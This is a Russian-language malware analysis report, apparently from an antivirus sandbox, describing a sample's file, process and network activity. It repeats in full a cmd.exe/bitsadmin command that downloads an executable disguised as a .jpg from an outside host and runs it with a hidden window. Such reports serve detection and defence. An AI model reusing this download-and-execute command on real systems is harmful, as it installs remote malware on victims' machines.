Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C BitsAdMin /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %USERPROFILE%\zIdFcBjwShm.exe && sTart %USERPROFILE%\zIdFcBjwShm.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cab15f1.tmp
- %WINDIR%\temp\tar15f2.tmp
- %WINDIR%\temp\cab2c7f.tmp
- %WINDIR%\temp\tar2c80.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cab15f1.tmp
- %WINDIR%\temp\tar15f2.tmp
- %WINDIR%\temp\cab2c7f.tmp
- %WINDIR%\temp\tar2c80.tmp
Сетевая активность
Подключается к
- 'co##y.moe':443
- 'pk#.goog':80
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'co##y.moe':443
UDP
- DNS ASK co##y.moe
- DNS ASK pk#.goog
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C BitsAdMin /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %USERPROFILE%\zIdFcBjwShm.exe && sTart %USERPROFILE%\zIdFcBjwShm.exe' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\bitsadmin.exe' /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %HOMEPATH%\zIdFcBjwShm.exe
